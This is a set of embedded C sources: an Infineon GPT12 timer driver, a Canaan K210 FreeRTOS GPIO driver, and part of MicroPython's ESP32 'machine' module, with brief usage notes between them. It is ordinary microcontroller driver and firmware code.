332914.c
/**
 * \file IfxGpt12.c
 * \brief GPT12 basic functionality
 *
 * \version iLLD_1_0_1_11_0
 * \copyright Copyright (c) 2019 Infineon Technologies AG. All rights reserved.
 *
 * IMPORTANT NOTICE
 *
 * Use of this file is subject to the terms of use agreed between (i) you or
 * the company in which ordinary course of business you are acting and (ii)
 * Infineon Technologies AG or its licensees. If and as long as no such
 * terms of use are agreed, use of this file is subject to following:
 *
 * Boost Software License - Version 1.0 - August 17th, 2003
 *
 * Permission is hereby granted, free of charge, to any person or
 * organization obtaining a copy of the software and accompanying
 * documentation covered by this license (the "Software") to use, reproduce,
 * display, distribute, execute, and transmit the Software, and to prepare
 * derivative works of the Software, and to permit third-parties to whom the
 * Software is furnished to do so, all subject to the following:
 *
 * The copyright notices in the Software and this entire statement, including
 * the above license grant, this restriction and the following disclaimer, must
 * be included in all copies of the Software, in whole or in part, and all
 * derivative works of the Software, unless such copies or derivative works are
 * solely in the form of machine-executable object code generated by a source
 * language processor.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT
 * SHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE
 * FOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE,
 * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
 * DEALINGS IN THE SOFTWARE.
 */

/******************************************************************************/
/*----------------------------------Includes---------------------------------*/
/******************************************************************************/
#include "IfxGpt12.h"

/******************************************************************************/
/*-------------------------Function Implementations--------------------------*/
/******************************************************************************/

float32 IfxGpt12_T2_getFrequency(Ifx_GPT12 *gpt12)
{
    float32                      freq = IfxGpt12_getModuleFrequency(gpt12);
    IfxGpt12_Mode                mode;
    IfxGpt12_TimerInputPrescaler prescaler;
    IfxGpt12_Gpt1BlockPrescaler  bps1 = (IfxGpt12_Gpt1BlockPrescaler)gpt12->T3CON.B.BPS1;

    switch (bps1)
    {
    case IfxGpt12_Gpt1BlockPrescaler_4:  freq = freq / 4;  break;
    case IfxGpt12_Gpt1BlockPrescaler_8:  freq = freq / 8;  break;
    case IfxGpt12_Gpt1BlockPrescaler_16: freq = freq / 16; break;
    default: /* case IfxGpt12_Gpt1BlockPrescaler_32: */
        freq = freq / 32; break;
    }

    mode      = IfxGpt12_T2_getMode(gpt12);
    prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T2CON.B.T2I;

    if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer))
    {
        freq = freq / (1 << prescaler);
    }
    else
    {
        freq = freq / 2;
    }

    return freq;
}


float32 IfxGpt12_T3_getFrequency(Ifx_GPT12 *gpt12)
{
    float32                      freq = IfxGpt12_getModuleFrequency(gpt12);
    IfxGpt12_Mode                mode;
    IfxGpt12_TimerInputPrescaler prescaler;
    IfxGpt12_Gpt1BlockPrescaler  bps1 = (IfxGpt12_Gpt1BlockPrescaler)gpt12->T3CON.B.BPS1;

    switch (bps1)
    {
    case IfxGpt12_Gpt1BlockPrescaler_4:  freq = freq / 4;  break;
    case IfxGpt12_Gpt1BlockPrescaler_8:  freq = freq / 8;  break;
    case IfxGpt12_Gpt1BlockPrescaler_16: freq = freq / 16; break;
    default: /* case IfxGpt12_Gpt1BlockPrescaler_32: */
        freq = freq / 32; break;
    }

    mode      = (IfxGpt12_Mode)gpt12->T3CON.B.T3M;
    prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T3CON.B.T3I;

    if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer))
    {
        freq = freq / (1 << prescaler);
    }
    else
    {
        freq = freq / 2;
    }

    return freq;
}


float32 IfxGpt12_T4_getFrequency(Ifx_GPT12 *gpt12)
{
    float32                      freq = IfxGpt12_getModuleFrequency(gpt12);
    IfxGpt12_Mode                mode;
    IfxGpt12_TimerInputPrescaler prescaler;
    IfxGpt12_Gpt1BlockPrescaler  bps1 = (IfxGpt12_Gpt1BlockPrescaler)gpt12->T3CON.B.BPS1;

    switch (bps1)
    {
    case IfxGpt12_Gpt1BlockPrescaler_4:  freq = freq / 4;  break;
    case IfxGpt12_Gpt1BlockPrescaler_8:  freq = freq / 8;  break;
    case IfxGpt12_Gpt1BlockPrescaler_16: freq = freq / 16; break;
    default: /* case IfxGpt12_Gpt1BlockPrescaler_32: */
        freq = freq / 32; break;
    }

    mode      = (IfxGpt12_Mode)gpt12->T4CON.B.T4M;
    prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T4CON.B.T4I;

    if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer))
    {
        freq = freq / (1 << prescaler);
    }
    else
    {
        freq = freq / 2;
    }

    return freq;
}


float32 IfxGpt12_T5_getFrequency(Ifx_GPT12 *gpt12)
{
    float32                      freq = IfxGpt12_getModuleFrequency(gpt12);
    IfxGpt12_Mode                mode;
    IfxGpt12_TimerInputPrescaler prescaler;
    IfxGpt12_Gpt2BlockPrescaler  bps2 = (IfxGpt12_Gpt2BlockPrescaler)gpt12->T6CON.B.BPS2;

    switch (bps2)
    {
    case IfxGpt12_Gpt2BlockPrescaler_2: freq = freq / 2; break;
    case IfxGpt12_Gpt2BlockPrescaler_4: freq = freq / 4; break;
    case IfxGpt12_Gpt2BlockPrescaler_8: freq = freq / 8; break;
    default: /* case IfxGpt12_Gpt2BlockPrescaler_16: */
        freq = freq / 16; break;
    }

    mode      = (IfxGpt12_Mode)gpt12->T5CON.B.T5M;
    prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T5CON.B.T5I;

    if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer))
    {
        freq = freq / (1 << prescaler);
    }
    else
    {
        freq = freq / 2;
    }

    return freq;
}


float32 IfxGpt12_T6_getFrequency(Ifx_GPT12 *gpt12)
{
    float32                      freq = IfxGpt12_getModuleFrequency(gpt12);
    IfxGpt12_Mode                mode;
    IfxGpt12_TimerInputPrescaler prescaler;
    IfxGpt12_Gpt2BlockPrescaler  bps2 = (IfxGpt12_Gpt2BlockPrescaler)gpt12->T6CON.B.BPS2;

    switch (bps2)
    {
    case IfxGpt12_Gpt2BlockPrescaler_2: freq = freq / 2; break;
    case IfxGpt12_Gpt2BlockPrescaler_4: freq = freq / 4; break;
    case IfxGpt12_Gpt2BlockPrescaler_8: freq = freq / 8; break;
    default: /* case IfxGpt12_Gpt2BlockPrescaler_16: */
        freq = freq / 16; break;
    }

    mode      = (IfxGpt12_Mode)gpt12->T6CON.B.T6M;
    prescaler = (IfxGpt12_TimerInputPrescaler)gpt12->T6CON.B.T6I;

    if ((mode == IfxGpt12_Mode_timer) || (mode == IfxGpt12_Mode_highGatedTimer) || (mode == IfxGpt12_Mode_lowGatedTimer))
    {
        freq = freq / (1 << prescaler);
    }
    else
    {
        freq = freq / 2;
    }

    return freq;
}


void IfxGpt12_disableModule(Ifx_GPT12 *gpt12)
{
    uint16 psw = IfxScuWdt_getCpuWatchdogPassword();
    IfxScuWdt_clearCpuEndinit(psw);
    gpt12->CLC.B.DISR = 1;
    IfxScuWdt_setCpuEndinit(psw);
}


void IfxGpt12_enableModule(Ifx_GPT12 *gpt12)
{
    uint16 psw = IfxScuWdt_getCpuWatchdogPassword();
    IfxScuWdt_clearCpuEndinit(psw);
    gpt12->CLC.B.DISR = 0;
    IfxScuWdt_setCpuEndinit(psw);
}


void IfxGpt12_initTxEudInPin(const IfxGpt12_TxEud_In *txEudIn, IfxPort_InputMode inputMode)
{
    IfxPort_setPinModeInput(txEudIn->pin.port, txEudIn->pin.pinIndex, inputMode);

    switch (txEudIn->timer)
    {
    case 2: IfxGpt12_T2_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    case 3: IfxGpt12_T3_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    case 4: IfxGpt12_T4_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    case 5: IfxGpt12_T5_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    case 6: IfxGpt12_T6_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    default: break;
    }
}


void IfxGpt12_initTxEudInPinWithPadLevel(const IfxGpt12_TxEud_In *txEudIn, IfxPort_InputMode inputMode, IfxPort_PadDriver padDriver)
{
    IfxPort_setPinModeInput(txEudIn->pin.port, txEudIn->pin.pinIndex, inputMode);
    IfxPort_setPinPadDriver(txEudIn->pin.port, txEudIn->pin.pinIndex, padDriver);

    switch (txEudIn->timer)
    {
    case 2: IfxGpt12_T2_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    case 3: IfxGpt12_T3_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    case 4: IfxGpt12_T4_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    case 5: IfxGpt12_T5_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    case 6: IfxGpt12_T6_setEudInput(txEudIn->module, (IfxGpt12_EudInput)txEudIn->select); break;
    default: break;
    }
}


void IfxGpt12_initTxInPin(const IfxGpt12_TxIn_In *txIn, IfxPort_InputMode inputMode)
{
    IfxPort_setPinModeInput(txIn->pin.port, txIn->pin.pinIndex, inputMode);

    switch (txIn->timer)
    {
    case 2: IfxGpt12_T2_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    case 3: IfxGpt12_T3_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    case 4: IfxGpt12_T4_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    case 5: IfxGpt12_T5_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    case 6: IfxGpt12_T6_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    default: break;
    }
}


void IfxGpt12_initTxInPinWithPadLevel(const IfxGpt12_TxIn_In *txIn, IfxPort_InputMode inputMode, IfxPort_PadDriver padDriver)
{
    IfxPort_setPinModeInput(txIn->pin.port, txIn->pin.pinIndex, inputMode);
    IfxPort_setPinPadDriver(txIn->pin.port, txIn->pin.pinIndex, padDriver);

    switch (txIn->timer)
    {
    case 2: IfxGpt12_T2_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    case 3: IfxGpt12_T3_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    case 4: IfxGpt12_T4_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    case 5: IfxGpt12_T5_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    case 6: IfxGpt12_T6_setInput(txIn->module, (IfxGpt12_Input)txIn->select); break;
    default: break;
    }
}


void IfxGpt12_resetModule(Ifx_GPT12 *gpt12)
{
    uint16 passwd = IfxScuWdt_getCpuWatchdogPassword();

    IfxScuWdt_clearCpuEndinit(passwd);
    gpt12->KRST0.B.RST = 1;             /* Only if both Kernel reset bits are set a reset is executed */
    gpt12->KRST1.B.RST = 1;
    IfxScuWdt_setCpuEndinit(passwd);

    while (0 == gpt12->KRST0.B.RSTSTAT) /* Wait until reset is executed */
    {}

    IfxScuWdt_clearCpuEndinit(passwd);
    gpt12->KRSTCLR.B.CLR = 1;           /* Clear Kernel reset status bit */
    IfxScuWdt_setCpuEndinit(passwd);
}
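Usage sketch (not part of IfxGpt12.c): the getters above decode a two-stage divider chain, module clock / block prescaler (BPS1 or BPS2) / timer prescaler, where the timer prescaler is 2^TxI in timer and gated-timer modes and a fixed 2 otherwise. A minimal example, assuming an iLLD platform where MODULE_GPT120 names the GPT12 register block (adjust to your device headers):

#include "IfxGpt12.h"

void example_readTimerClock(void)
{
    IfxGpt12_enableModule(&MODULE_GPT120);   /* clear CLC.DISR so the kernel is clocked */

    /* f_T3 = f_GPT12 / BPS1 / 2^T3I in timer and gated-timer modes,
     * or f_GPT12 / BPS1 / 2 in the external-count modes. */
    float32 fT3 = IfxGpt12_T3_getFrequency(&MODULE_GPT120);
    (void)fT3;                               /* e.g. feed a reload-value calculation */
}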
473093.c
/* Copyright 2018 Canaan Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#include <FreeRTOS.h>
#include <driver.h>
#include <fpioa.h>
#include <gpio.h>
#include <io.h>
#include <semphr.h>
#include <stdio.h>
#include <sysctl.h>

#define COMMON_ENTRY                                              \
    gpio_data *data = (gpio_data *)userdata;                      \
    volatile gpio_t *gpio = (volatile gpio_t *)data->base_addr;   \
    configASSERT(pin < data->pin_count);                          \
    (void)data;                                                   \
    (void)gpio;

typedef struct
{
    uint32_t pin_count;
    uintptr_t base_addr;
} gpio_data;

static void gpio_install(void *userdata)
{
    /* GPIO clock under APB0 clock, so enable APB0 clock firstly */
    sysctl_clock_enable(SYSCTL_CLOCK_APB0);
    sysctl_clock_enable(SYSCTL_CLOCK_APB1);
    sysctl_clock_enable(SYSCTL_CLOCK_GPIO);
}

static int gpio_open(void *userdata)
{
    return 1;
}

static void gpio_close(void *userdata)
{
}

static void gpio_set_drive_mode(uint32_t pin, gpio_drive_mode_t mode, void *userdata)
{
    COMMON_ENTRY;
    int io_number = fpioa_get_io_by_function(FUNC_GPIO0 + pin);
    configASSERT(io_number > 0);

    fpioa_pull_t pull = 0;
    uint32_t dir = 0;

    switch (mode)
    {
    case GPIO_DM_INPUT:
        pull = FPIOA_PULL_NONE;
        dir = 0;
        break;
    case GPIO_DM_INPUT_PULL_DOWN:
        pull = FPIOA_PULL_DOWN;
        dir = 0;
        break;
    case GPIO_DM_INPUT_PULL_UP:
        pull = FPIOA_PULL_UP;
        dir = 0;
        break;
    case GPIO_DM_OUTPUT:
        pull = FPIOA_PULL_DOWN;
        dir = 1;
        break;
    default:
        configASSERT(!"GPIO drive mode is not supported.");
        break;
    }

    fpioa_set_io_pull(io_number, pull);
    set_bit_idx(gpio->direction.u32, pin, dir);
}

static void gpio_set_pin_edge(uint32_t pin, gpio_pin_edge_t edge, void *userdata)
{
    COMMON_ENTRY;
    configASSERT(!"Not supported.");
}

static void gpio_set_on_changed(uint32_t pin, gpio_on_changed_t callback, void *callback_data, void *userdata)
{
    COMMON_ENTRY;
    configASSERT(!"Not supported.");
}

static gpio_pin_value_t gpio_get_pin_value(uint32_t pin, void *userdata)
{
    COMMON_ENTRY;
    uint32_t dir = get_bit_idx(gpio->direction.u32, pin);
    volatile uint32_t *reg = dir ? gpio->data_output.u32 : gpio->data_input.u32;
    return get_bit_idx(reg, pin);
}

static void gpio_set_pin_value(uint32_t pin, gpio_pin_value_t value, void *userdata)
{
    COMMON_ENTRY;
    uint32_t dir = get_bit_idx(gpio->direction.u32, pin);
    volatile uint32_t *reg = dir ? gpio->data_output.u32 : gpio->data_input.u32;
    configASSERT(dir == 1);
    set_bit_idx(reg, pin, value);
}

static gpio_data dev0_data = {8, GPIO_BASE_ADDR};

const gpio_driver_t g_gpio_driver_gpio0 = {{&dev0_data, gpio_install, gpio_open, gpio_close}, 8,
    gpio_set_drive_mode, gpio_set_pin_edge, gpio_set_on_changed, gpio_set_pin_value, gpio_get_pin_value};
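All register access in this driver funnels through the get_bit_idx/set_bit_idx helpers from io.h, called with a pointer into the GPIO register block and a bit index. For reference, a minimal sketch of what such bit-index helpers typically look like; these are hypothetical stand-ins, and the SDK's real definitions in io.h may differ:

/* Hypothetical stand-ins for the io.h helpers used above, to make the
 * read-modify-write pattern concrete. Not the SDK's actual code. */
static inline uint32_t get_bit_idx(volatile uint32_t *bits, uint32_t idx)
{
    return (bits[idx / 32U] >> (idx % 32U)) & 1U;
}

static inline void set_bit_idx(volatile uint32_t *bits, uint32_t idx, uint32_t value)
{
    uint32_t mask = 1U << (idx % 32U);
    bits[idx / 32U] = value ? (bits[idx / 32U] | mask) : (bits[idx / 32U] & ~mask);
}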
829516.c
/*
 * This file is part of the MicroPython project, http://micropython.org/
 *
 * Development of the code in this file was sponsored by Microbric Pty Ltd
 *
 * The MIT License (MIT)
 *
 * Copyright (c) 2013-2015 Damien P. George
 * Copyright (c) 2016 Paul Sokolovsky
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#include <stdint.h>
#include <stdio.h>

#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "esp_sleep.h"
#include "esp_pm.h"
#include "driver/touch_pad.h"

#if CONFIG_IDF_TARGET_ESP32
#include "esp32/rom/rtc.h"
#include "esp32/clk.h"
#elif CONFIG_IDF_TARGET_ESP32S2
#include "esp32s2/rom/rtc.h"
#include "esp32s2/clk.h"
#elif CONFIG_IDF_TARGET_ESP32S3
#include "esp32s3/rom/rtc.h"
#include "esp32s3/clk.h"
#endif

#include "py/obj.h"
#include "py/runtime.h"
#include "lib/utils/pyexec.h"
#include "extmod/machine_mem.h"
#include "extmod/machine_signal.h"
#include "extmod/machine_pulse.h"
#include "extmod/machine_i2c.h"
#include "extmod/machine_spi.h"
#include "modmachine.h"
#include "machine_rtc.h"

#if MICROPY_PY_MACHINE

typedef enum {
    MP_PWRON_RESET = 1,
    MP_HARD_RESET,
    MP_WDT_RESET,
    MP_DEEPSLEEP_RESET,
    MP_SOFT_RESET
} reset_reason_t;

STATIC bool is_soft_reset = 0;

STATIC mp_obj_t machine_freq(size_t n_args, const mp_obj_t *args) {
    if (n_args == 0) {
        // get
        return mp_obj_new_int(esp_clk_cpu_freq());
    } else {
        // set
        mp_int_t freq = mp_obj_get_int(args[0]) / 1000000;
        if (freq != 20 && freq != 40 && freq != 80 && freq != 160 && freq != 240) {
            mp_raise_ValueError(MP_ERROR_TEXT("frequency must be 20MHz, 40MHz, 80MHz, 160MHz or 240MHz"));
        }
        #if CONFIG_IDF_TARGET_ESP32
        esp_pm_config_esp32_t pm;
        #elif CONFIG_IDF_TARGET_ESP32S2
        esp_pm_config_esp32s2_t pm;
        #endif
        pm.max_freq_mhz = freq;
        pm.min_freq_mhz = freq;
        pm.light_sleep_enable = false;
        esp_err_t ret = esp_pm_configure(&pm);
        if (ret != ESP_OK) {
            mp_raise_ValueError(NULL);
        }
        while (esp_clk_cpu_freq() != freq * 1000000) {
            vTaskDelay(1);
        }
        return mp_const_none;
    }
}
STATIC MP_DEFINE_CONST_FUN_OBJ_VAR_BETWEEN(machine_freq_obj, 0, 1, machine_freq);

STATIC mp_obj_t machine_sleep_helper(wake_type_t wake_type, size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) {
    enum { ARG_sleep_ms };
    const mp_arg_t allowed_args[] = {
        { MP_QSTR_sleep_ms, MP_ARG_INT, { .u_int = 0 } },
    };
    mp_arg_val_t args[MP_ARRAY_SIZE(allowed_args)];
    mp_arg_parse_all(n_args, pos_args, kw_args, MP_ARRAY_SIZE(allowed_args), allowed_args, args);

    mp_int_t expiry = args[ARG_sleep_ms].u_int;
    if (expiry != 0) {
        esp_sleep_enable_timer_wakeup(((uint64_t)expiry) * 1000);
    }

    if (machine_rtc_config.ext0_pin != -1 && (machine_rtc_config.ext0_wake_types & wake_type)) {
        esp_sleep_enable_ext0_wakeup(machine_rtc_config.ext0_pin, machine_rtc_config.ext0_level ? 1 : 0);
    }

    if (machine_rtc_config.ext1_pins != 0) {
        esp_sleep_enable_ext1_wakeup(
            machine_rtc_config.ext1_pins,
            machine_rtc_config.ext1_level ? ESP_EXT1_WAKEUP_ANY_HIGH : ESP_EXT1_WAKEUP_ALL_LOW);
    }

    if (machine_rtc_config.wake_on_touch) {
        if (esp_sleep_enable_touchpad_wakeup() != ESP_OK) {
            mp_raise_msg(&mp_type_RuntimeError, MP_ERROR_TEXT("esp_sleep_enable_touchpad_wakeup() failed"));
        }
    }

    switch (wake_type) {
        case MACHINE_WAKE_SLEEP:
            esp_light_sleep_start();
            break;
        case MACHINE_WAKE_DEEPSLEEP:
            esp_deep_sleep_start();
            break;
    }
    return mp_const_none;
}

STATIC mp_obj_t machine_lightsleep(size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) {
    return machine_sleep_helper(MACHINE_WAKE_SLEEP, n_args, pos_args, kw_args);
};
STATIC MP_DEFINE_CONST_FUN_OBJ_KW(machine_lightsleep_obj, 0, machine_lightsleep);

STATIC mp_obj_t machine_deepsleep(size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) {
    return machine_sleep_helper(MACHINE_WAKE_DEEPSLEEP, n_args, pos_args, kw_args);
};
STATIC MP_DEFINE_CONST_FUN_OBJ_KW(machine_deepsleep_obj, 0, machine_deepsleep);

STATIC mp_obj_t machine_reset_cause(size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) {
    if (is_soft_reset) {
        return MP_OBJ_NEW_SMALL_INT(MP_SOFT_RESET);
    }
    switch (esp_reset_reason()) {
        case ESP_RST_POWERON:
        case ESP_RST_BROWNOUT:
            return MP_OBJ_NEW_SMALL_INT(MP_PWRON_RESET);
            break;

        case ESP_RST_INT_WDT:
        case ESP_RST_TASK_WDT:
        case ESP_RST_WDT:
            return MP_OBJ_NEW_SMALL_INT(MP_WDT_RESET);
            break;

        case ESP_RST_DEEPSLEEP:
            return MP_OBJ_NEW_SMALL_INT(MP_DEEPSLEEP_RESET);
            break;

        case ESP_RST_SW:
        case ESP_RST_PANIC:
        case ESP_RST_EXT: // Comment in ESP-IDF: "For ESP32, ESP_RST_EXT is never returned"
            return MP_OBJ_NEW_SMALL_INT(MP_HARD_RESET);
            break;

        case ESP_RST_SDIO:
        case ESP_RST_UNKNOWN:
        default:
            return MP_OBJ_NEW_SMALL_INT(0);
            break;
    }
}
STATIC MP_DEFINE_CONST_FUN_OBJ_KW(machine_reset_cause_obj, 0, machine_reset_cause);

void machine_init(void) {
    is_soft_reset = 0;
}

void machine_deinit(void) {
    // we are doing a soft-reset so change the reset_cause
    is_soft_reset = 1;
}

STATIC mp_obj_t machine_wake_reason(size_t n_args, const mp_obj_t *pos_args, mp_map_t *kw_args) {
    return MP_OBJ_NEW_SMALL_INT(esp_sleep_get_wakeup_cause());
}
STATIC MP_DEFINE_CONST_FUN_OBJ_KW(machine_wake_reason_obj, 0, machine_wake_reason);

STATIC mp_obj_t machine_reset(void) {
    esp_restart();
    return mp_const_none;
}
STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_reset_obj, machine_reset);

STATIC mp_obj_t machine_soft_reset(void) {
    pyexec_system_exit = PYEXEC_FORCED_EXIT;
    mp_raise_type(&mp_type_SystemExit);
}
STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_soft_reset_obj, machine_soft_reset);

STATIC mp_obj_t machine_unique_id(void) {
    uint8_t chipid[6];
    esp_efuse_mac_get_default(chipid);
    return mp_obj_new_bytes(chipid, 6);
}
STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_unique_id_obj, machine_unique_id);

STATIC mp_obj_t machine_idle(void) {
    taskYIELD();
    return mp_const_none;
}
STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_idle_obj, machine_idle);

STATIC mp_obj_t machine_disable_irq(void) {
    uint32_t state = MICROPY_BEGIN_ATOMIC_SECTION();
    return mp_obj_new_int(state);
}
MP_DEFINE_CONST_FUN_OBJ_0(machine_disable_irq_obj, machine_disable_irq);

STATIC mp_obj_t machine_enable_irq(mp_obj_t state_in) {
    uint32_t state = mp_obj_get_int(state_in);
    MICROPY_END_ATOMIC_SECTION(state);
    return mp_const_none;
}
MP_DEFINE_CONST_FUN_OBJ_1(machine_enable_irq_obj, machine_enable_irq);

STATIC const mp_rom_map_elem_t machine_module_globals_table[] = {
    { MP_ROM_QSTR(MP_QSTR___name__), MP_ROM_QSTR(MP_QSTR_umachine) },
    { MP_ROM_QSTR(MP_QSTR_mem8), MP_ROM_PTR(&machine_mem8_obj) },
    { MP_ROM_QSTR(MP_QSTR_mem16), MP_ROM_PTR(&machine_mem16_obj) },
    { MP_ROM_QSTR(MP_QSTR_mem32), MP_ROM_PTR(&machine_mem32_obj) },

    { MP_ROM_QSTR(MP_QSTR_freq), MP_ROM_PTR(&machine_freq_obj) },
    { MP_ROM_QSTR(MP_QSTR_reset), MP_ROM_PTR(&machine_reset_obj) },
    { MP_ROM_QSTR(MP_QSTR_soft_reset), MP_ROM_PTR(&machine_soft_reset_obj) },
    { MP_ROM_QSTR(MP_QSTR_unique_id), MP_ROM_PTR(&machine_unique_id_obj) },
    { MP_ROM_QSTR(MP_QSTR_sleep), MP_ROM_PTR(&machine_lightsleep_obj) },
    { MP_ROM_QSTR(MP_QSTR_lightsleep), MP_ROM_PTR(&machine_lightsleep_obj) },
    { MP_ROM_QSTR(MP_QSTR_deepsleep), MP_ROM_PTR(&machine_deepsleep_obj) },
    { MP_ROM_QSTR(MP_QSTR_idle), MP_ROM_PTR(&machine_idle_obj) },

    { MP_ROM_QSTR(MP_QSTR_disable_irq), MP_ROM_PTR(&machine_disable_irq_obj) },
    { MP_ROM_QSTR(MP_QSTR_enable_irq), MP_ROM_PTR(&machine_enable_irq_obj) },

    { MP_ROM_QSTR(MP_QSTR_time_pulse_us), MP_ROM_PTR(&machine_time_pulse_us_obj) },

    { MP_ROM_QSTR(MP_QSTR_Timer), MP_ROM_PTR(&machine_timer_type) },
    { MP_ROM_QSTR(MP_QSTR_WDT), MP_ROM_PTR(&machine_wdt_type) },
    #if MICROPY_HW_ENABLE_SDCARD
    { MP_ROM_QSTR(MP_QSTR_SDCard), MP_ROM_PTR(&machine_sdcard_type) },
    #endif

    // wake abilities
    { MP_ROM_QSTR(MP_QSTR_SLEEP), MP_ROM_INT(MACHINE_WAKE_SLEEP) },
    { MP_ROM_QSTR(MP_QSTR_DEEPSLEEP), MP_ROM_INT(MACHINE_WAKE_DEEPSLEEP) },
    { MP_ROM_QSTR(MP_QSTR_Pin), MP_ROM_PTR(&machine_pin_type) },
    { MP_ROM_QSTR(MP_QSTR_Signal), MP_ROM_PTR(&machine_signal_type) },
    #if CONFIG_IDF_TARGET_ESP32
    { MP_ROM_QSTR(MP_QSTR_TouchPad), MP_ROM_PTR(&machine_touchpad_type) },
    #endif
    { MP_ROM_QSTR(MP_QSTR_ADC), MP_ROM_PTR(&machine_adc_type) },
    { MP_ROM_QSTR(MP_QSTR_DAC), MP_ROM_PTR(&machine_dac_type) },
    { MP_ROM_QSTR(MP_QSTR_I2C), MP_ROM_PTR(&machine_hw_i2c_type) },
    { MP_ROM_QSTR(MP_QSTR_SoftI2C), MP_ROM_PTR(&mp_machine_soft_i2c_type) },
    { MP_ROM_QSTR(MP_QSTR_I2S), MP_ROM_PTR(&machine_i2s_type) },
    { MP_ROM_QSTR(MP_QSTR_PWM), MP_ROM_PTR(&machine_pwm_type) },
    { MP_ROM_QSTR(MP_QSTR_RTC), MP_ROM_PTR(&machine_rtc_type) },
    { MP_ROM_QSTR(MP_QSTR_SPI), MP_ROM_PTR(&machine_hw_spi_type) },
    { MP_ROM_QSTR(MP_QSTR_SoftSPI), MP_ROM_PTR(&mp_machine_soft_spi_type) },
    { MP_ROM_QSTR(MP_QSTR_UART), MP_ROM_PTR(&machine_uart_type) },

    // Reset reasons
    { MP_ROM_QSTR(MP_QSTR_reset_cause), MP_ROM_PTR(&machine_reset_cause_obj) },
    { MP_ROM_QSTR(MP_QSTR_HARD_RESET), MP_ROM_INT(MP_HARD_RESET) },
    { MP_ROM_QSTR(MP_QSTR_PWRON_RESET), MP_ROM_INT(MP_PWRON_RESET) },
    { MP_ROM_QSTR(MP_QSTR_WDT_RESET), MP_ROM_INT(MP_WDT_RESET) },
    { MP_ROM_QSTR(MP_QSTR_DEEPSLEEP_RESET), MP_ROM_INT(MP_DEEPSLEEP_RESET) },
    { MP_ROM_QSTR(MP_QSTR_SOFT_RESET), MP_ROM_INT(MP_SOFT_RESET) },

    // Wake reasons
    { MP_ROM_QSTR(MP_QSTR_wake_reason), MP_ROM_PTR(&machine_wake_reason_obj) },
